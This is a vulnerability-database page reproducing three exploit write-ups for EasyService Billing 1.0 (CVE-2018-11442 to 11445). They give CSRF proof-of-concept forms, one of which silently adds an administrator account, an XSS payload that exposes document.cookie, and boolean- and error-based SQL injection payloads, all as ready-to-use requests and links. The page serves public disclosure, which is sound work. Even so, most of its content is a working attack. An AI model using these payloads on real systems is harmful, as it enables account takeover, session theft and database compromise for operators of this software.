Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

EasyService Billing 1.0 CSRF / XSS / SQL Injection

Related Vulnerabilities: CVE-2018-11445   CVE-2018-11442   CVE-2018-11443   CVE-2018-11444  
Publish Date: 26 May 2018
Author: Divya Jain
Source 
                Exploit 1 of 3:

<!--
# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery
# Date: 25-05-2018
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
# Exploit Author: Divya Jain
# Version: EasyService Billing 1.0 
# CVE: CVE-2018-11445,CVE-2018-11442
# Category: Webapps
# Severity: Medium
# Tested on: KaLi LinuX_x64
# # # # # # # #
#
# Proof of Concept:
           //////////////////////////
          / CSRF in Quotation Page /
         //////////////////////////
# Initial Request:
 
POST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139
Cookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
 
quotation_id=139&quotation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1
 
# CSRF POC:
 
<html>
 <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139" method="POST">
      <input type="hidden" name="quotation_id" value="139" />
      <input type="hidden" name="quotation_no" value="249" />
      <input type="hidden" name="des" value="testnew" />
      <input type="hidden" name="button" value="Save" />
      <input type="hidden" name="MM_update" value="form1" />
      <input type="hidden" name="MM_insert" value="form1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
           ///////////////////////////
          // CSRF in User Add Page //
         ///////////////////////////
          
# Initial Request
 
POST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.com/EasyServiceBilling/system-settings-user-new2.php
Cookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
 
type=Admin&un=a&pw=b&MM_insert=form1
          
# CSRF POC
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://test.com/EasyServiceBilling/system-settings-user-new2.php?" method="POST">
      <input type="hidden" name="type" value="Admin" />
      <input type="hidden" name="un" value="adminTest" />
      <input type="hidden" name="pw" value="adminTest" />
      <input type="hidden" name="MM_insert" value="form1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
          
-->

Exploit 2 of 3:

<!--
# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter
# Date: 25-05-2018
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
# Exploit Author: Divya Jain
# Version: EasyService Billing 1.0 
# CVE: CVE-2018-11443
# Category: Webapps
# Severity: Medium
# Tested on: KaLi LinuX_x64
# # # # #
# 
# Proof of Concept:
#
            ///////////
           //  XSS  //
          ///////////
  
 Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=
 Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
 Parameter: q
 Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
  
 ###########################################################################



Exploit 3 of 3:

<!--
# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q=
# Date: 25-05-2018
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
# Exploit Author: Divya Jain
# Version: EasyService Billing 1.0 
# CVE: CVE-2018-11444
# Category: Webapps
# Severity: High
# Tested on: KaLi LinuX_x64
# # # # # # # #
#
 
# Proof of Concept:
        ////////////////////////////////
          SQL Injection in q parameter
        ///////////////////////////////
    Affected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=
# Boolean Based Blind SQL
Payload: 1337'OR%20NOT 1=1--
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1--
 
# Error-Based SQL
Payload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD
 
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD
#################################

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started